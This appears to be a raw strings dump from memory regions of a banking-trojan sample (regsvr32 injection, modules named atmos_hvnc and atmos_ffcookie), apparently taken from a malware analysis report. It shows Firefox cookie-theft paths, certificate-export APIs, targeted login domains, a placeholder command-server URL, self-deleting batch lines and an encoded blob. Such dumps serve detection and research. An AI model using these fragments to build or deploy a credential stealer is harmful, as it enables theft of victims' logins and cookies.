.restore ?DB? FILE Restore content of DB (default "main") from FILE
.schema ?TABLE? Show the CREATE statements
.schema ?TABLE? Show the CREATE statements
.separator STRING Change separator used by output mode and .import
.separator STRING Change separator used by output mode and .import
.show Show the current values for various settings
.show Show the current values for various settings
.stats ON|OFF Turn stats on or off
.stats ON|OFF Turn stats on or off
.tables ?TABLE? List names of tables
.tables ?TABLE? List names of tables
.timeout MS Try opening locked tables for MS milliseconds
.timeout MS Try opening locked tables for MS milliseconds
.trace FILE|off Output each SQL statement as it is run
.trace FILE|off Output each SQL statement as it is run
.vfsname ?AUX? Print the name of the VFS stack
.vfsname ?AUX? Print the name of the VFS stack
.width NUM1 NUM2 ... Set column widths for "column" mode
.width NUM1 NUM2 ... Set column widths for "column" mode
.timer ON|OFF Turn the CPU timer measurement on or off
.timer ON|OFF Turn the CPU timer measurement on or off
Error: unable to open database "%s": %s
Error: unable to open database "%s": %s
Error: cannot open "%s"
Error: cannot open "%s"
Error: %s
Error: %s
PRAGMA foreign_keys=OFF;
PRAGMA foreign_keys=OFF;
SELECT name, type, sql FROM sqlite_master WHERE sql NOT NULL AND type=='table' AND name!='sqlite_sequence'
SELECT name, type, sql FROM sqlite_master WHERE sql NOT NULL AND type=='table' AND name!='sqlite_sequence'
SELECT name, type, sql FROM sqlite_master WHERE name=='sqlite_sequence'
SELECT name, type, sql FROM sqlite_master WHERE name=='sqlite_sequence'
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view')
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view')
SELECT name, type, sql FROM sqlite_master WHERE tbl_name LIKE shellstatic() AND type=='table' AND sql NOT NULL
SELECT name, type, sql FROM sqlite_master WHERE tbl_name LIKE shellstatic() AND type=='table' AND sql NOT NULL
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view') AND tbl_name LIKE shellstatic()
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view') AND tbl_name LIKE shellstatic()
import
import
Error: non-null separator required for import
Error: non-null separator required for import
SELECT * FROM %s
SELECT * FROM %s
INSERT INTO %s VALUES(?
INSERT INTO %s VALUES(?
Error: %s line %d: expected %d columns of data but found %d
Error: %s line %d: expected %d columns of data but found %d
SELECT name FROM sqlite_master WHERE type='index' AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' ORDER BY 1
SELECT name FROM sqlite_master WHERE type='index' AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' ORDER BY 1
SELECT name FROM sqlite_master WHERE type='index' AND tbl_name LIKE shellstatic() UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' AND tbl_name LIKE shellstatic() ORDER BY 1
SELECT name FROM sqlite_master WHERE type='index' AND tbl_name LIKE shellstatic() UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' AND tbl_name LIKE shellstatic() ORDER BY 1
Error: querying sqlite_master and sqlite_temp_master
Error: querying sqlite_master and sqlite_temp_master
Error: invalid arguments: "%s". Enter ".help" for help
Error: invalid arguments: "%s". Enter ".help" for help
Error: cannot open pipe "%s"
Error: cannot open pipe "%s"
Error: cannot write to "%s"
Error: cannot write to "%s"
CREATE TABLE sqlite_master (
CREATE TABLE sqlite_master (
CREATE TEMP TABLE sqlite_temp_master (
CREATE TEMP TABLE sqlite_temp_master (
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE lower(tbl_name) LIKE shellstatic() AND type!='meta' AND sql NOTNULL ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE lower(tbl_name) LIKE shellstatic() AND type!='meta' AND sql NOTNULL ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE type!='meta' AND sql NOTNULL AND name NOT LIKE 'sqlite_%'ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE type!='meta' AND sql NOTNULL AND name NOT LIKE 'sqlite_%'ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
%9.9s: %s
%9.9s: %s
SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT 'temp.' || name FROM sqlite_temp_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT 'temp.' || name FROM sqlite_temp_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT '%q.' || name FROM "%w".sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT '%q.' || name FROM "%w".sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%s%-*s
%s%-*s
iskeyword
iskeyword
ambiguous option name: "%s"
ambiguous option name: "%s"
Error: invalid testctrl option: %s
Error: invalid testctrl option: %s
%d (0xx)
%d (0xx)
Error: testctrl %s takes a single int option
Error: testctrl %s takes a single int option
Error: testctrl %s takes no options
Error: testctrl %s takes no options
Error: testctrl %s takes a single unsigned int option
Error: testctrl %s takes a single unsigned int option
Error: CLI support for testctrl %s not implemented
Error: CLI support for testctrl %s not implemented
SQLite %s %s
SQLite %s %s
Error: unknown command or invalid arguments: "%s". Enter ".help" for help
Error: unknown command or invalid arguments: "%s". Enter ".help" for help
Error: near line %d:
Error: near line %d:
%s %s
%s %s
Error: incomplete SQL: %s
Error: incomplete SQL: %s
%s: Error: cannot locate your home directory
%s: Error: cannot locate your home directory
%s/.sqliterc
%s/.sqliterc
-- Loading resources from %s
-- Loading resources from %s
Usage: %s [OPTIONS] FILENAME [SQL]
Usage: %s [OPTIONS] FILENAME [SQL]
FILENAME is the name of an SQLite database. A new database is created
FILENAME is the name of an SQLite database. A new database is created
sqlite>
sqlite>
SQLite header and source version mismatch
SQLite header and source version mismatch
no such VFS: "%s"
no such VFS: "%s"
%s: Error: too many options: "%s"
%s: Error: too many options: "%s"
%s: Error: missing argument for option: %s
%s: Error: missing argument for option: %s
Error: unable to process SQL "%s"
Error: unable to process SQL "%s"
%s: Error: unknown option: %s
%s: Error: unknown option: %s
%s/.sqlite_history
%s/.sqlite_history
SQLite version %s %.19s
SQLite version %s %.19s
Enter ".help" for instructions
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
Enter SQL statements terminated with a ";"
zcÁ
zcÁ
%System%\regsvr32.exe
%System%\regsvr32.exe
GetCPInfo
GetCPInfo
]
]
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
KERNEL32.DLL
KERNEL32.DLL
ole32.dll
ole32.dll
ffcookieextractor.dll
ffcookieextractor.dll
_getFirefoxCookie
_getFirefoxCookie
mscoree.dll
mscoree.dll
nKERNEL32.DLL
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
WUSER32.DLL
WUSER32.DLL
888816666554443
888816666554443
6666554443
6666554443
!6666554443
!6666554443
%AppData%\Mozilla\Firefox
%AppData%\Mozilla\Firefox
\profiles.ini
\profiles.ini
\cookies.sqlite
\cookies.sqlite
Kernel32.dll
Kernel32.dll
regsvr32.exe_3264_rwx_01000000_00005000:
.text
.text
`.data
`.data
.rsrc
.rsrc
msvcrt.dll
msvcrt.dll
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
USER32.dll
USER32.dll
ole32.dll
ole32.dll
regsvr32.pdb
regsvr32.pdb
_wcmdln
_wcmdln
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
Excessive # of DLL's on cmdline
Excessive # of DLL's on cmdline
5.1.2600.5512 (xpsp.080413-2105)
5.1.2600.5512 (xpsp.080413-2105)
REGSVR32.EXE
REGSVR32.EXE
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall
Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall
Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.
Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.
LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.
LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.
%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.
%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.
OleUninitialize failed.["%1" is not an executable file and no registration
OleUninitialize failed.["%1" is not an executable file and no registration
new.exe_3664:
.text
.text
`.rdata
`.rdata
@.data
@.data
a%FnQU
a%FnQU
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
EnumChildWindows
EnumChildWindows
EnumWindows
EnumWindows
USER32.dll
USER32.dll
\d.nC
\d.nC
v1%ULRg
v1%ULRg
]j'
]j'
)%uj>_
)%uj>_
.io*U
.io*U
dxKeY
dxKeY
ntdll.dll
ntdll.dll
setup.dat
setup.dat
regsvr32.exe_3384_rwx_00070000_00047000:
.text
.text
`.data
`.data
.reloc
.reloc
update.exe
update.exe
config.bin
config.bin
%0&!%F
%0&!%F
?)500>(8
?)500>(8
7-52&
7-52&
,%)4.5(";$2
,%)4.5(";$2
:'$!71689/
:'$!71689/
-0=).?,7
-0=).?,7
60/)4:5
60/)4:5
-*?)2
-*?)2
>5;(4-2>)4 }744
>5;(4-2>)4 }744
"?5&"5%3%/
"?5&"5%3%/
398>7="'
398>7="'
;!)5:. =##
;!)5:. =##
Z#%xDVOE
Z#%xDVOE
(00(7> 59
(00(7> 59
$6>59$=1
$6>59$=1
^EXKSQN_^%X Sf
^EXKSQN_^%X Sf
PR_OpenTCPSocket
PR_OpenTCPSocket
%s%s%s
%s%s%s
gdiplus.dll
gdiplus.dll
GdiplusShutdown
GdiplusShutdown
ole32.dll
ole32.dll
gdi32.dll
gdi32.dll
?
?
value=[%s], code=[%s]
value=[%s], code=[%s]
HTTP/1.1
HTTP/1.1
HTTP/1.0
HTTP/1.0
hXXps://
hXXps://
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.1
HTTP/1.
HTTP/1.
X-WebKit-CSP
X-WebKit-CSP
hXXp://VVV.google.com/webhp
hXXp://VVV.google.com/webhp
%COMMANDSERVER%
%COMMANDSERVER%
hXXp://127.0.0.1:%u/
hXXp://127.0.0.1:%u/
X-Type: %s
X-Type: %s
_getFirefoxCookie
_getFirefoxCookie
hXXp://
hXXp://
atmos_hvnc.module
atmos_hvnc.module
atmos_ffcookie.module
atmos_ffcookie.module
atmos_video.module
atmos_video.module
userenv.dll
userenv.dll
del "%s"
del "%s"
if exist "%s" goto d
if exist "%s" goto d
del /F "%s"
del /F "%s"
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)
urlmon.dll
urlmon.dll
cabinet.dll
cabinet.dll
hXXp://xxxxxxxx.com/xxxx/xxxx.php
hXXp://xxxxxxxx.com/xxxx/xxxx.php
%s, u %s %u u:u:u GMT
%s, u %s %u u:u:u GMT
; charset=%s
; charset=%s
HTTP/1.1 %u %s
HTTP/1.1 %u %s
Date: %s
Date: %s
Content-Length: %u
Content-Length: %u
Expires: %s
Expires: %s
Content-Type: %s%s
Content-Type: %s%s
ID: %s
ID: %s
value_%s
value_%s
value_%s_%s
value_%s_%s
%s = "%s";
%s = "%s";
*.facebook.com
*.facebook.com
*.twitter.com
*.twitter.com
*.instagram.com
*.instagram.com
*.booking.com
*.booking.com
*.sharepoint.com
*.sharepoint.com
*.yahoo.com
*.yahoo.com
login.yahoo.com
login.yahoo.com
*.google.com
*.google.com
accounts.google.com
accounts.google.com
192.168.*.*
192.168.*.*
127.0.0.1
127.0.0.1
*/wp-login.php*
*/wp-login.php*
*.xn--p1ai
*.xn--p1ai
Cookie: %s
Cookie: %s
Referer: %s
Referer: %s
Accept: %s
Accept: %s
Accept-Language: %s
Accept-Language: %s
Accept-Encoding: %s
Accept-Encoding: %s
SSSh8
SSSh8
9.tI3
9.tI3
CreatePipe
CreatePipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
RegCreateKeyW
RegCreateKeyW
RegEnumKeyW
RegEnumKeyW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegEnumKeyExW
RegEnumKeyExW
ADVAPI32.dll
ADVAPI32.dll
UrlUnescapeA
UrlUnescapeA
SHDeleteKeyW
SHDeleteKeyW
PathIsURLW
PathIsURLW
SHLWAPI.dll
SHLWAPI.dll
ShellExecuteW
ShellExecuteW
ShellExecuteExW
ShellExecuteExW
SHELL32.dll
SHELL32.dll
Secur32.dll
Secur32.dll
GDI32.dll
GDI32.dll
WS2_32.dll
WS2_32.dll
PFXImportCertStore
PFXImportCertStore
CertDeleteCertificateFromStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertOpenSystemStoreW
CertCloseStore
CertCloseStore
CertEnumCertificatesInStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertDuplicateCertificateContext
PFXExportCertStoreEx
PFXExportCertStoreEx
CRYPT32.dll
CRYPT32.dll
HttpSendRequestExA
HttpSendRequestExA
HttpQueryInfoA
HttpQueryInfoA
HttpSendRequestExW
HttpSendRequestExW
HttpSendRequestW
HttpSendRequestW
HttpOpenRequestA
HttpOpenRequestA
HttpOpenRequestW
HttpOpenRequestW
HttpEndRequestA
HttpEndRequestA
HttpSendRequestA
HttpSendRequestA
HttpEndRequestW
HttpEndRequestW
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
InternetCrackUrlA
InternetCrackUrlA
InternetCrackUrlW
InternetCrackUrlW
WININET.dll
WININET.dll
OLEAUT32.dll
OLEAUT32.dll
NETAPI32.dll
NETAPI32.dll
VERSION.dll
VERSION.dll
NtQueryKey
NtQueryKey
ntdll.dll
ntdll.dll
PSSSSSSh
PSSSSSSh
SSSh4
SSSh4
SUWt^Ht[Ht.Huc
SUWt^Ht[Ht.Huc
2!242:2?2[2
2!242:2?2[2
Chrome
Chrome
Firefox
Firefox
nnspr4.dll
nnspr4.dll
nss3.dll
nss3.dll
chrome.dll
chrome.dll
Process (u minute): %s
Process (u minute): %s
Input: %s
Input: %s
X-TS-Rule-Name: %s
X-TS-Rule-Name: %s
X-TS-Rule-PatternID: %u
X-TS-Rule-PatternID: %u
X-TS-BotID: %s
X-TS-BotID: %s
X-TS-Domain: %s
X-TS-Domain: %s
X-TS-SessionID: %s
X-TS-SessionID: %s
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
X-TS-Header-Cookie: %S
X-TS-Header-Cookie: %S
X-TS-Header-Referer: %S
X-TS-Header-Referer: %S
X-TS-Header-AcceptEncoding: %S
X-TS-Header-AcceptEncoding: %S
X-TS-Header-AcceptLanguage: %S
X-TS-Header-AcceptLanguage: %S
X-TS-Header-UserAgent: %S
X-TS-Header-UserAgent: %S
kernel32.dll
kernel32.dll
Global\XXX
Global\XXX
Company: %s
Company: %s
Product: %s
Product: %s
Version: %s
Version: %s
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Uninstall
%u: %s | %s | %s
%u: %s | %s | %s
%sd1%
%sd1%
%sd2%
%sd2%
Name: %s
Name: %s
Path: %s
Path: %s
Hash: %s
Hash: %s
Time: u.u.u
Time: u.u.u
\StringFileInfo\xx\%s
\StringFileInfo\xx\%s
"%s" %s
"%s" %s
/c "%s"
/c "%s"
%sx.%s
%sx.%s
%sx
%sx
SELECT * FROM %s
SELECT * FROM %s
Rapport
Rapport
sXXXX
sXXXX
d*.swf
d*.swf
*.flv
*.flv
*.png
*.png
*.jpg
*.jpg
*.ico
*.ico
*.gif
*.gif
*.css
*.css
%Documents and Settings%\%current user%\Application Data\Uccyemuzput\odobdima.xia
%Documents and Settings%\%current user%\Application Data\Uccyemuzput\odobdima.xia
%Documents and Settings%\%current user%\Application Data\Uccyemuzput
%Documents and Settings%\%current user%\Application Data\Uccyemuzput
odobdima.xia
odobdima.xia
:\Documents and Settings\"%CurrentUserName%"\Application Data\Felaytzyymes\zaodxiibaru.ilb
:\Documents and Settings\"%CurrentUserName%"\Application Data\Felaytzyymes\zaodxiibaru.ilb
%Documents and Settings%\%current user%\Application Data\Felaytzyymes
%Documents and Settings%\%current user%\Application Data\Felaytzyymes
zaodxiibaru.ilb
zaodxiibaru.ilb
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Application Data
regsvr32.exe_3384_rwx_000D0000_000C0000:
.idata
.idata
.reloc
.reloc
P.rsrc
P.rsrc
Portions Copyright (c) 1983,99 Borland
Portions Copyright (c) 1983,99 Borland
kernel32.dll
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
wininet.dll
wininet.dll
user32.dll
user32.dll
ntdll.dll
ntdll.dll
Kernel32.dll
Kernel32.dll
URLMON.DLL
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
PSAPI.dll
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {jwplayer().play()} catch(e){}
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowser
IWebBrowserApp4
IWebBrowserApp4
IWebBrowser2l
IWebBrowser2l
.length;
.length;
=String.fromCharCode(parseInt(
=String.fromCharCode(parseInt(
.substr(
.substr(
,2),16));
,2),16));
=String.fromCharCode(
=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt()^
,1).charCodeAt());
,1).charCodeAt());
.length-1)?
.length-1)?
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Environment("Process"))("
.Run("
.Run("
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.RegRead("
.RegRead("
psapi.dll
psapi.dll
HTTP/1.1
HTTP/1.1
\\.\LCD
\\.\LCD
1234567890
1234567890
Shell32.dll
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
0123456789
Mozilla
Mozilla
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
.text
.text
`.rdata
`.rdata
@.pdata
@.pdata
KERNEL32.dll
KERNEL32.dll
@.reloc
@.reloc
222.dll
222.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
oleaut32.dll
oleaut32.dll
RegOpenKeyExW
RegOpenKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyW
RegCreateKeyA
RegCreateKeyA
version.dll
version.dll
SetProcessWindowStation
SetProcessWindowStation
OpenWindowStationA
OpenWindowStationA
EnumChildWindows
EnumChildWindows
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
FindCloseUrlCache
DeleteUrlCacheEntry
DeleteUrlCacheEntry
ole32.dll
ole32.dll
wsock32.dll
wsock32.dll
winmm.dll
winmm.dll
atl.dll
atl.dll
wtsapi32.dll
wtsapi32.dll
Wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
PSAPI.DLL
shell32.dll
shell32.dll
ShellExecuteExW
ShellExecuteExW
NtQueryValueKey
NtQueryValueKey
NtDeleteValueKey
NtDeleteValueKey
NtSetValueKey
NtSetValueKey
urlmon.dll
urlmon.dll
UrlMkSetSessionOption
UrlMkSetSessionOption
4"4,414?4
4"4,414?4
3,313[3`3
3,313[3`3
829
829
=.=3=[=`=
=.=3=[=`=
>!>&>7>
>!>&>7>
7)707;7@7
7)707;7@7
= =$=,=_=
= =$=,=_=
?0'101>1
?0'101>1
: :&: :}:
: :&: :}:
?,?;?@?^?
?,?;?@?^?
8 8$8(8,808
8 8$8(8,808
c2h3PgXWqt2QzTRrb/AnQFC6SRUgWch7j77TVxtWrXEisi5gWjLIKgQWWPjhp0UgEz/kVUGNipnIPLZxi8BxUOwd9J5DQbsosxVqooPcMxy2MFTKpmT8aROKg4jgPL5ULF6ilWRorquC8m0XR dR8hd6QeMVN1z8qMkD1vqxgm4LrkB3rrUobN/saPP2hYsk6VQTT5huKnOMVL5caR5vadBp7OdRzhgDnQIi0zuYfIv v02VfY9J3rrQjqC1 pFYIFt3Gp4UAQmbDJLGUi8hvJ5jIHnHXh6ZdE G2FTkJ3CI2Lj2wf8fOmqGCNuCUBH6Ec7vvAylDcuOVeqr6H9 GqsS1IfkCCllztP/uhBjWjey5V SSDAqDhRCVH uTCvACRGgad bO9wKfoRWb20kkPK8CJRO3Cb3ZBKGOeh51oRkebuOLldMrwBX33FmSkln88u4JdiIX3EOwtJpJ8fNuFb9sVJKqbY0xHN8Kq1Or8RhXvuFhn9jvExwsg77Nm9pukUDgOKXK2YjwzI43i2jlgqjXRjPGNPPw8yrBpOYbuqtlz4xPvXSChtWkqlonwCNmHPfYIqUJsozXDoUSntJjEjPKcnSYnNd4VI/OTKRZl4s3QZK4AiriXs m2G8zO3JfYHA4Mzloj7x/ZrAhvhzeMKq4FLKRhJG4T2JXyLgwvQjwXdohUQg4iEYHpcny L36V4uUkFcvU1tvpqDtiOQYa70HHcPEJfYLV8Toym38KdYL9IJPqUdop utIX7HhaldlXLQIAz7PWZnlHKctlhe5qmCRh7GYrijRosE0KLIyPrqsKKjC7bEFYXy01KABfO qe1pH4Q6vjT2LIWDeAU0QF7cNTSc9IrXxuiKrH9fzzDBmL0r2uP90MTpzx4Q6QXF6LFGMM4bSQRJvDy82dHpceQb5 wSJiwXfI1q0lw2j7yeKKU4d1S2yu1KSDqXTy9EIbNA OTz83nYnlm92yC4Q C1WaY TFWNwLLReTWs1XYS 5ycpe2nbJMnH2nWskkuEycGRyOKeWv9mBEriqVlrPdTjCXGsosq0/ze tTOFwuJz2YC0fKpts4kJR9uU15hpCl3Ic9igp1oMS77Hpr/6MeMHu7DkBY7jRBBOMa8af3kOwdC7KHIoA3ugO6idmr2mNlnOIPZ02aJF4A7BUmGxq6fAc/d4nsDOKJhYVDSSQ7jFKn0BxkkeEXGn1jlhM30sWUYRiITZB4hz3dELYpaKpOauqQgZJXLMoJUZjswMZcIHw8 hQQZBbCiXHRvYT0LMALC4KzcYhBVimTnaCzF92A/IwjwmuMcLdSrwxeDl hgJ64QRn4shSxTV72EJEeStKbUWop6I3XrGwDJziks02zJZ8Ngv5XQj8/6DVvQGXFx4TWNeBjq bLTDVLKQUg0huyqGeRETme3vgtHptbc3HtKLcy0vfPN7ho3GliJnfIlnwhAqPHR5IA154JiYW0oM7LzXCvf1CKxpj1LiIrZnwB6d7Jtt3Q8QKx 0eOeMKVM0ssWxpfLZL071LCj9dr01FLINneXWUENh HrZMrHiIwMc1UdC1vKZBx pQDZ646bysxGLoBQGMRzGdjCDwvbbfEXBUrd/g9Fb8hisLCdrpwEdRSFKUJPqH3u0UM6aNat6SOaQC2KyCuj XpXuVQl42OBunYjp28FYnjJ69lTqmpbMzQlwbndruPKMFUzTs7exQHCtDnZmeknvkCEDf6KSkltgHq1kAC84KUjHejJtsRDuBx0 zeOZ7k1xdwTTZ6D09GDNmaScqIuJBvxivLT94S5LKC6lFbmV89F32bLDuyMgdZst/wMPHcFbzg05tfs7uTHFvQFFuOLpHnHSgPnuNioE97QtBFTp6b9JZbfpd2gx jCYIjC6 c jSeFFiVxYZXbEZZZwc/YdSdKleWp1mhPeQm3JVaKaTXHwATQyKbAA5StQDJ1vp7z0ktMKi6ccOlyToNIZKAtx2K5VhhYNCQuk3aOczite07juFnr4cqEWU3ExokG73gHNySThVIb7F4aSuWLuvjJBJIPKF40P9iC768a11KJFrEnBjefcP2wz/YSZVEB4nyEQ06n3xYDzUt/F2cZ5JjhDq88rEvlE24 rRGht8HZgCa5XNtR51BNuBt3pp2eW78aCwiOEI8VDbn7AruVqkZrQQyYiz6MehXkTK77WrmjXVq5vzgUt4Jzu0pRfZGETR3S5xfz5uV2giiqXE6lYyjuBM0jm2JNf nUn iN35Go8p0Li5fuLrpjddQ1dFuKdDNclSXqPKGbcZU125ad0veW6dcXfvAw/P9kMO8/TKTtnfOw8XBDk2xHFOeyXOK/91hTRYgWLfAdC40pzwnNwRaWu2Aaw/vVSJQ/gFTtm5GDHCSIcKgmANglVtydNm8YkauqtmguErNundREO/6Xo5XpIF3kajshYV/7KjUgwJi9iqoftmRJ94/Tnr70imCuitzO5r81yZ3k1z4U 9Me8weKT69PB2aJTIMhrak6AV 2frGulcO1ju8IPk7W8QOYSGWq cymI4z/Bz5J1hFhMdrMzlFpBMzPF5zagQCDIFZV1HxA/RIEJeOKSZ4Sh1I 9/BXsFpOpr2zx 